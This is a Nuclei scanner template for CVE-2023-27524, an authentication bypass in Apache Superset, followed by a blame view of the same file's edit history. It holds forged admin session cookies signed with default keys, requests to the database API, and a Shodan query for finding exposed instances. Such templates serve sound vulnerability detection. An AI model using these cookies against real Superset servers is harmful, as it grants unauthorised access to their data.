nuclei-templates/http/cves/2023/CVE-2023-27524.yaml

id: CVE-2023-27524

info:
  name: Apache Superset - Authentication Bypass
  author: DhiyaneshDK,_0xf4n9x_
  severity: critical
  description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
  reference:
    - https://github.com/horizon3ai/CVE-2023-27524
    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
    - http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html
    - http://www.openwall.com/lists/oss-security/2023/04/24/2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27524
    cwe-id: CWE-1188
    epss-score: 0.71231
    cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:*
  metadata:
    max-request: 45
    verified: true
    shodan-query: html:"Apache Superset"
    vendor: apache
    product: superset
  tags: cve,cve2023,apache,superset,auth-bypass

http:
  - raw:
      - |
        GET /api/v1/database/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session}}

    payloads:
      path:
        - '1'
        - '2'
        - '3'
        - '4'
        - '5'
        - '6'
        - '7'
        - '9'
        - '10'

      session:
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U'
    attack: clusterbomb
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"database_name":'
          - '"configuration_method":'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`id: CVE-2023-27524`

			`info:`
updated matcher 2023-04-26 02:45:47 +00:00			`name: Apache Superset - Authentication Bypass`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`author: DhiyaneshDK,_0xf4n9x_`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`severity: critical`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.`
			`reference:`
			`- https://github.com/horizon3ai/CVE-2023-27524`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`- https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-27524`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html`
			`- http://www.openwall.com/lists/oss-security/2023/04/24/2`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`classification:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`cve-id: CVE-2023-27524`
			`cwe-id: CWE-1188`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.71231`
			`cpe: cpe:2.3:a:apache:superset::::::::`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 45`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`shodan-query: html:"Apache Superset"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: superset`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`tags: cve,cve2023,apache,superset,auth-bypass`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`- raw:`
			`- \|`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`GET /api/v1/database/{{path}} HTTP/1.1`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`Host: {{Hostname}}`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`Cookie: session={{session}}`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`payloads:`
trail space fix 2023-04-26 11:57:03 +00:00			`path:`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`- '1'`
			`- '2'`
			`- '3'`
			`- '4'`
			`- '5'`
			`- '6'`
			`- '7'`
			`- '9'`
			`- '10'`
trail space fix 2023-04-26 11:57:03 +00:00
			`session:`
Update CVE-2023-27524.yaml 2023-07-10 15:21:35 +00:00			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U'`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`attack: clusterbomb`
			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"database_name":'`
updated matcher 2023-04-26 02:45:47 +00:00			`- '"configuration_method":'`
			`condition: and`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00
			`- type: status`
			`status:`
			`- 200`